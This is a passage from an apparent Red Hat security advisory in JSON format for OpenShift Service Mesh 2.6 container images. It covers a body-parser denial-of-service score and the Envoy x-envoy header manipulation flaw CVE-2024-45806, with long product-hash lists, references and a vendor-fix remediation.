"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:c5562019a94ccaa070d4c2107b992847ecfdee49c1f4dd3043e3c20307b74112_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:fb11daf6c17ea22d9b80af3f2b48807a00e73a347e081f046beb5707923ea976_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:32d02294f6c3ed5ee704852afb31a98777eeae19fa48f2cfbfa0aa17701eb025_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:7a69b6ecf90b9be263edfca0ffa4f40cb8c076f7472559efb09a83a48da92de5_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:92965aba07c6c3ae594fa30f72b47692b9692639f47882d3a29b1fe3938f1325_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:c00a763b4b037c92378363a29e55c057fd1ae5e7efaded6ca6e53c4be1c13404_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:231e044e7f872d658114881aab776604e583d2b8da0448a2272ffd15c711db3d_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:3c87f98e0b065af6bd93090edaa2187218dbed286f712a56daefad5a2bd124ae_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:bd7006b966f6d367bc1814750c1465f7ffb9e39fc2fb7d3607d11dabc77115d6_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:cf746daf197865ecb846af2475fcea56c0555c8bdafb7864d4718f1da3d872dc_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:2050b64b6d66ba3c4a068311ab1737219c318ec4f9e4b07cc33fecf47c3b6795_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:276689457eada53dacecf65a92bf64a7535add94c728b165771bc27e3b10009c_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:29cf0230854ac71bb01095db0b07783bac74d12b4164d263bd66f1d225fb48bd_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:d6ae2eb93558b129b0051980ff73e0e09d41763eb29c2564a28a60281d9f59c7_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:5c6810907b68548ca4d79b6d07e9b936ce74e4efbd2e39e225793bce1d15e1d9_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:7a35294bd4d2a4f9d2fbc3ac1f24e8aef5aa0a84c2780c275348c77df68f5a32_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:80ad09921b68b246a30bcfebef670cac228e5b8e0a7db63c0462e09a518d68ec_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:b28f8f238dfa4dc4590fe326ef1c0db17238dda3640a0e9fdf8fb93a69b4e0c3_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:37bb32758dbda228f036d2b0cb3cf7010926334f9ebc82bebf0cac5c397c9bd3_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:4223dcfd7630709f2841b220281120cc6010548d8e59e27cebdf304f16fcf3ac_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:acab16ff4de53601dd13971b5165f5ca6ba68345be9a2135469e246d385243cc_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:ce49c56b67a541d00a985c7e7da4a8d36d968f93bafd5d037586476c3583f9d8_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:03e25e6be5dd9909f4917494c282eaa888bcb3e2a1b6fdb6e819be8bfcde3578_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:871eff21377954f22da7aded97f65dbb1d9ed8cfdd33c29b790609e36b0bdeec_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:931c5faa35bc2200fa595ea418e861c6ca8c8bcda34821aa0592565c7873415a_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:a99e9d30ac8b5767b7eb95c3183f8dde99130ce5441928da1082a4e48108715b_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:40e075e75225da1082774c0ec33b314b9659d27e36fb698726d466a7be0e63f3_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:8e103924f51e6697e0a6890e9aaafd9b48e1fef7a8300badcac6bb0220807794_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:a224fe00e59b8e7c85d479bc3962e81ba274ef3be4b2aee55e56534f4d03aa32_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:c4fcdfa308b9995044e0daab35916b3e85dc94dd30131a9410652dcf23e8e27f_s390x",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:11e2e2f3a3b26a9d79573277c6f38d06f6906bdda547556fe92eee57a89fe86e_ppc64le",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:19b29793f5615cd360e83e736471175db4dc205ae33f3914b28d41502036e655_amd64",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:56cdb7f7540a76bf10235d4c3048ef99d8d8602b8420f16a03ef7d446c18df87_s390x",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:cdfee2e141fa6559a6c64373177a4a666e39052add4498b880c08c496e25109e_arm64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:239b42c643b37c7aa7de38e9eeb00222e9dcc8e96b845307c73ecb48ec8f6175_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:26d5dec1bf366dac99df61dd31cf8a6a6937b4e81d1d61a3b3b57e7bf8ee3375_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:58760b14fd38690a490f7a5ea01e44c5ceee193324488ed4016203c042f88e7b_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:a50a14787a8765c1c9da772d58d08138cacb29ba41e32bc3f5c0ff9b8452d40b_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:3c5142ebe3cb9c77b67c29fd7a6fb6b5176ace9833f69aaebec658b4ca8232ad_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:b72249b5326e4606f53a0130f099ccb636241de275891f98e0a622c8db1a4c9c_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:c5562019a94ccaa070d4c2107b992847ecfdee49c1f4dd3043e3c20307b74112_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:fb11daf6c17ea22d9b80af3f2b48807a00e73a347e081f046beb5707923ea976_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:32d02294f6c3ed5ee704852afb31a98777eeae19fa48f2cfbfa0aa17701eb025_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:7a69b6ecf90b9be263edfca0ffa4f40cb8c076f7472559efb09a83a48da92de5_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:92965aba07c6c3ae594fa30f72b47692b9692639f47882d3a29b1fe3938f1325_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:c00a763b4b037c92378363a29e55c057fd1ae5e7efaded6ca6e53c4be1c13404_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:231e044e7f872d658114881aab776604e583d2b8da0448a2272ffd15c711db3d_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:3c87f98e0b065af6bd93090edaa2187218dbed286f712a56daefad5a2bd124ae_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:bd7006b966f6d367bc1814750c1465f7ffb9e39fc2fb7d3607d11dabc77115d6_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:cf746daf197865ecb846af2475fcea56c0555c8bdafb7864d4718f1da3d872dc_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:2050b64b6d66ba3c4a068311ab1737219c318ec4f9e4b07cc33fecf47c3b6795_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:276689457eada53dacecf65a92bf64a7535add94c728b165771bc27e3b10009c_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:29cf0230854ac71bb01095db0b07783bac74d12b4164d263bd66f1d225fb48bd_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:d6ae2eb93558b129b0051980ff73e0e09d41763eb29c2564a28a60281d9f59c7_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:5c6810907b68548ca4d79b6d07e9b936ce74e4efbd2e39e225793bce1d15e1d9_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:7a35294bd4d2a4f9d2fbc3ac1f24e8aef5aa0a84c2780c275348c77df68f5a32_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:80ad09921b68b246a30bcfebef670cac228e5b8e0a7db63c0462e09a518d68ec_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:b28f8f238dfa4dc4590fe326ef1c0db17238dda3640a0e9fdf8fb93a69b4e0c3_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:37bb32758dbda228f036d2b0cb3cf7010926334f9ebc82bebf0cac5c397c9bd3_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:4223dcfd7630709f2841b220281120cc6010548d8e59e27cebdf304f16fcf3ac_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:acab16ff4de53601dd13971b5165f5ca6ba68345be9a2135469e246d385243cc_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:ce49c56b67a541d00a985c7e7da4a8d36d968f93bafd5d037586476c3583f9d8_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:03e25e6be5dd9909f4917494c282eaa888bcb3e2a1b6fdb6e819be8bfcde3578_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:871eff21377954f22da7aded97f65dbb1d9ed8cfdd33c29b790609e36b0bdeec_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:931c5faa35bc2200fa595ea418e861c6ca8c8bcda34821aa0592565c7873415a_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:a99e9d30ac8b5767b7eb95c3183f8dde99130ce5441928da1082a4e48108715b_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:40e075e75225da1082774c0ec33b314b9659d27e36fb698726d466a7be0e63f3_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:8e103924f51e6697e0a6890e9aaafd9b48e1fef7a8300badcac6bb0220807794_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:a224fe00e59b8e7c85d479bc3962e81ba274ef3be4b2aee55e56534f4d03aa32_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:c4fcdfa308b9995044e0daab35916b3e85dc94dd30131a9410652dcf23e8e27f_s390x",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:11e2e2f3a3b26a9d79573277c6f38d06f6906bdda547556fe92eee57a89fe86e_ppc64le",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:19b29793f5615cd360e83e736471175db4dc205ae33f3914b28d41502036e655_amd64",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:56cdb7f7540a76bf10235d4c3048ef99d8d8602b8420f16a03ef7d446c18df87_s390x",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:cdfee2e141fa6559a6c64373177a4a666e39052add4498b880c08c496e25109e_arm64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "body-parser: Denial of Service Vulnerability in body-parser"
},
{
"acknowledgments": [
{
"names": [
"Mike Whale"
]
},
{
"names": [
"James Force"
],
"organization": "Red Hat",
"summary": "This issue was discovered by Red Hat."
}
],
"cve": "CVE-2024-45806",
"cwe": {
"id": "CWE-639",
"name": "Authorization Bypass Through User-Controlled Key"
},
"discovery_date": "2024-09-20T00:40:20.976812+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2313683"
}
],
"notes": [
{
"category": "description",
"text": "A vulnerability was found in Envoy that allows external clients to manipulate Envoy headers, potentially leading to unauthorized access or other malicious actions within the mesh. This issue arises due to Envoy\u0027s default configuration of internal trust boundaries, which considers all RFC1918 private address ranges as internal. The default behavior for handling internal addresses in Envoy has been changed. Previously, RFC1918 IP addresses were automatically considered internal, even if the internal_address_config was empty. The default configuration of Envoy will continue to trust internal addresses while in this release and it will not trust them by default in next release. If you have tooling such as probes on your private network which need to be treated as trusted such as changing arbitrary x-envoy headers, please explicitly include those addresses or CIDR ranges into `internal_address_config`. Successful exploitation could allow attackers to bypass security controls, access sensitive data, or disrupt services within the mesh, like Istio.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "envoy: Potential to manipulate `x-envoy` headers from external sources",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "Red Hat\u0027s CVSS score and impact are specific to our product and may not match those of upstream. This is due to how envoy is configured and used within our OpenShift Service Mesh product.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:239b42c643b37c7aa7de38e9eeb00222e9dcc8e96b845307c73ecb48ec8f6175_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:26d5dec1bf366dac99df61dd31cf8a6a6937b4e81d1d61a3b3b57e7bf8ee3375_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:58760b14fd38690a490f7a5ea01e44c5ceee193324488ed4016203c042f88e7b_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:a50a14787a8765c1c9da772d58d08138cacb29ba41e32bc3f5c0ff9b8452d40b_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:3c5142ebe3cb9c77b67c29fd7a6fb6b5176ace9833f69aaebec658b4ca8232ad_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:b72249b5326e4606f53a0130f099ccb636241de275891f98e0a622c8db1a4c9c_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:c5562019a94ccaa070d4c2107b992847ecfdee49c1f4dd3043e3c20307b74112_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:fb11daf6c17ea22d9b80af3f2b48807a00e73a347e081f046beb5707923ea976_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:32d02294f6c3ed5ee704852afb31a98777eeae19fa48f2cfbfa0aa17701eb025_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:7a69b6ecf90b9be263edfca0ffa4f40cb8c076f7472559efb09a83a48da92de5_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:92965aba07c6c3ae594fa30f72b47692b9692639f47882d3a29b1fe3938f1325_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:c00a763b4b037c92378363a29e55c057fd1ae5e7efaded6ca6e53c4be1c13404_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:231e044e7f872d658114881aab776604e583d2b8da0448a2272ffd15c711db3d_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:3c87f98e0b065af6bd93090edaa2187218dbed286f712a56daefad5a2bd124ae_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:bd7006b966f6d367bc1814750c1465f7ffb9e39fc2fb7d3607d11dabc77115d6_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:cf746daf197865ecb846af2475fcea56c0555c8bdafb7864d4718f1da3d872dc_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:2050b64b6d66ba3c4a068311ab1737219c318ec4f9e4b07cc33fecf47c3b6795_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:276689457eada53dacecf65a92bf64a7535add94c728b165771bc27e3b10009c_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:29cf0230854ac71bb01095db0b07783bac74d12b4164d263bd66f1d225fb48bd_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:d6ae2eb93558b129b0051980ff73e0e09d41763eb29c2564a28a60281d9f59c7_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:5c6810907b68548ca4d79b6d07e9b936ce74e4efbd2e39e225793bce1d15e1d9_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:7a35294bd4d2a4f9d2fbc3ac1f24e8aef5aa0a84c2780c275348c77df68f5a32_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:80ad09921b68b246a30bcfebef670cac228e5b8e0a7db63c0462e09a518d68ec_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:b28f8f238dfa4dc4590fe326ef1c0db17238dda3640a0e9fdf8fb93a69b4e0c3_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:37bb32758dbda228f036d2b0cb3cf7010926334f9ebc82bebf0cac5c397c9bd3_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:4223dcfd7630709f2841b220281120cc6010548d8e59e27cebdf304f16fcf3ac_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:acab16ff4de53601dd13971b5165f5ca6ba68345be9a2135469e246d385243cc_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:ce49c56b67a541d00a985c7e7da4a8d36d968f93bafd5d037586476c3583f9d8_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:03e25e6be5dd9909f4917494c282eaa888bcb3e2a1b6fdb6e819be8bfcde3578_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:871eff21377954f22da7aded97f65dbb1d9ed8cfdd33c29b790609e36b0bdeec_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:931c5faa35bc2200fa595ea418e861c6ca8c8bcda34821aa0592565c7873415a_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:a99e9d30ac8b5767b7eb95c3183f8dde99130ce5441928da1082a4e48108715b_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:40e075e75225da1082774c0ec33b314b9659d27e36fb698726d466a7be0e63f3_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:8e103924f51e6697e0a6890e9aaafd9b48e1fef7a8300badcac6bb0220807794_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:a224fe00e59b8e7c85d479bc3962e81ba274ef3be4b2aee55e56534f4d03aa32_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:c4fcdfa308b9995044e0daab35916b3e85dc94dd30131a9410652dcf23e8e27f_s390x",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:11e2e2f3a3b26a9d79573277c6f38d06f6906bdda547556fe92eee57a89fe86e_ppc64le",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:19b29793f5615cd360e83e736471175db4dc205ae33f3914b28d41502036e655_amd64",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:56cdb7f7540a76bf10235d4c3048ef99d8d8602b8420f16a03ef7d446c18df87_s390x",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:cdfee2e141fa6559a6c64373177a4a666e39052add4498b880c08c496e25109e_arm64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2024-45806"
},
{
"category": "external",
"summary": "RHBZ#2313683",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2313683"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2024-45806",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-45806"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2024-45806",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-45806"
},
{
"category": "external",
"summary": "https://github.com/envoyproxy/envoy/security/advisories/GHSA-ffhv-fvxq-r6mf",
"url": "https://github.com/envoyproxy/envoy/security/advisories/GHSA-ffhv-fvxq-r6mf"
}
],
"release_date": "2024-09-20T00:15:02.293000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2024-10-07T09:24:48+00:00",
"details": "Before applying this update, make sure all previously released errata relevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:239b42c643b37c7aa7de38e9eeb00222e9dcc8e96b845307c73ecb48ec8f6175_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:26d5dec1bf366dac99df61dd31cf8a6a6937b4e81d1d61a3b3b57e7bf8ee3375_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:58760b14fd38690a490f7a5ea01e44c5ceee193324488ed4016203c042f88e7b_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:a50a14787a8765c1c9da772d58d08138cacb29ba41e32bc3f5c0ff9b8452d40b_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:3c5142ebe3cb9c77b67c29fd7a6fb6b5176ace9833f69aaebec658b4ca8232ad_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:b72249b5326e4606f53a0130f099ccb636241de275891f98e0a622c8db1a4c9c_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:c5562019a94ccaa070d4c2107b992847ecfdee49c1f4dd3043e3c20307b74112_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:fb11daf6c17ea22d9b80af3f2b48807a00e73a347e081f046beb5707923ea976_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:32d02294f6c3ed5ee704852afb31a98777eeae19fa48f2cfbfa0aa17701eb025_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:7a69b6ecf90b9be263edfca0ffa4f40cb8c076f7472559efb09a83a48da92de5_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:92965aba07c6c3ae594fa30f72b47692b9692639f47882d3a29b1fe3938f1325_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:c00a763b4b037c92378363a29e55c057fd1ae5e7efaded6ca6e53c4be1c13404_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:231e044e7f872d658114881aab776604e583d2b8da0448a2272ffd15c711db3d_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:3c87f98e0b065af6bd93090edaa2187218dbed286f712a56daefad5a2bd124ae_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:bd7006b966f6d367bc1814750c1465f7ffb9e39fc2fb7d3607d11dabc77115d6_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:cf746daf197865ecb846af2475fcea56c0555c8bdafb7864d4718f1da3d872dc_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:2050b64b6d66ba3c4a068311ab1737219c318ec4f9e4b07cc33fecf47c3b6795_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:276689457eada53dacecf65a92bf64a7535add94c728b165771bc27e3b10009c_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:29cf0230854ac71bb01095db0b07783bac74d12b4164d263bd66f1d225fb48bd_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:d6ae2eb93558b129b0051980ff73e0e09d41763eb29c2564a28a60281d9f59c7_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:5c6810907b68548ca4d79b6d07e9b936ce74e4efbd2e39e225793bce1d15e1d9_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:7a35294bd4d2a4f9d2fbc3ac1f24e8aef5aa0a84c2780c275348c77df68f5a32_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:80ad09921b68b246a30bcfebef670cac228e5b8e0a7db63c0462e09a518d68ec_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:b28f8f238dfa4dc4590fe326ef1c0db17238dda3640a0e9fdf8fb93a69b4e0c3_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:37bb32758dbda228f036d2b0cb3cf7010926334f9ebc82bebf0cac5c397c9bd3_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:4223dcfd7630709f2841b220281120cc6010548d8e59e27cebdf304f16fcf3ac_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:acab16ff4de53601dd13971b5165f5ca6ba68345be9a2135469e246d385243cc_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:ce49c56b67a541d00a985c7e7da4a8d36d968f93bafd5d037586476c3583f9d8_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:03e25e6be5dd9909f4917494c282eaa888bcb3e2a1b6fdb6e819be8bfcde3578_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:871eff21377954f22da7aded97f65dbb1d9ed8cfdd33c29b790609e36b0bdeec_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:931c5faa35bc2200fa595ea418e861c6ca8c8bcda34821aa0592565c7873415a_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:a99e9d30ac8b5767b7eb95c3183f8dde99130ce5441928da1082a4e48108715b_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:40e075e75225da1082774c0ec33b314b9659d27e36fb698726d466a7be0e63f3_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:8e103924f51e6697e0a6890e9aaafd9b48e1fef7a8300badcac6bb0220807794_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:a224fe00e59b8e7c85d479bc3962e81ba274ef3be4b2aee55e56534f4d03aa32_amd64",
